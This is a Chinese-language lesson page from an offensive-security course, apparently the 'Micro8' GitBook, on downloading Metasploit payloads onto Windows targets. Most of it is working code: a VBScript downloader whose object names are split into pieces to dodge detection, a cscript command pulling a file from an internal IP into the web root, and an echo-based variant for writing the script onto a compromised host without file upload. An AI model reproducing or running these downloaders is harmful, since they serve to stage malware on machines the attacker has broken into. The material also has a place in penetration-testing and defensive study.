Micro8
专注APT攻击与防御
Search…
前言
Preface
目录
第一章:生
1-10课
11-20课
21-30课
31-40课
第三十一课:msf的前生今世
第三十二课:配置vps上的msf
第三十三课:攻击Mysql服务
第三十四课:攻击Sql server 服务
第三十五课:与Sqlmap结合攻击
第三十六课:解决vps上ssh掉线
第三十七课:vbs一句话下载payload
第三十八课:certutil一句话下载payload
第三十九课:vbs一句话下载payload补充
第四十课:ftp一句话下载payload
41-50课
51-60课
61-70课
71-80课
81-90课
91-100课
第二章:老(待更新...)
第三章:病(待更新...)
Powered By
GitBook
第三十七课:vbs一句话下载payload
一次 msf 完整的流程离不开目标机的 payload 下载与执行。而针对不同环境目标,考虑或者选择不同方式的 payload 下载与执行。如 webshell 下,注入点下。smb 下等。而针对不同的实际环境,来做最好的选择。
既然本季开始专门针对 windows 下的 payload 下载讲解,那么就需要考虑到目标机的系统版本,是windows2000,windows 2003,或者是更高的版本如 windows 2016等。
无论是哪个版本的windows系列,都是支持vbs的。
靶机:
windows 2003
vbs:
保存downfile.vbs ```visual basic set a=createobject("adod"+"b.stream"):set w=createobject("micro"+"soft.xmlhttp"):w.open "get",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2
1
### 命令行下执行:
2
```bash
3
cscript downfile.vbs http://192.168.1.115/robots.txt C:\Inetpub\b.txt
Copied!
往往在实战中,没有上传的方便条件,尤其是目标机是 windows,只有 echo 方式来写入 vbs。
命令行下执行:
1
echo
set
a
=
createobject
(
^
"adod^"
+^
"b.stream^"
)
:set
2
w
=
createobject
(
^
"micro^"
+^
"soft.xmlhttp^"
)
:w.open^
"get^"
,wsh.arguments
(
0
)
,0:w.send:a.type
=
1
:a.open:a.write w.responsebody:a.savetofile
3
wsh.arguments
(
1
)
,2
>>
downfile.vbs
Copied!
优点:
支持windows全版本系列
缺点:
对https不友好
Micropoor
Previous
第三十六课:解决vps上ssh掉线
Next
第三十八课:certutil一句话下载payload
Last modified
3yr ago
Copy link
Contents
vbs:
命令行下执行: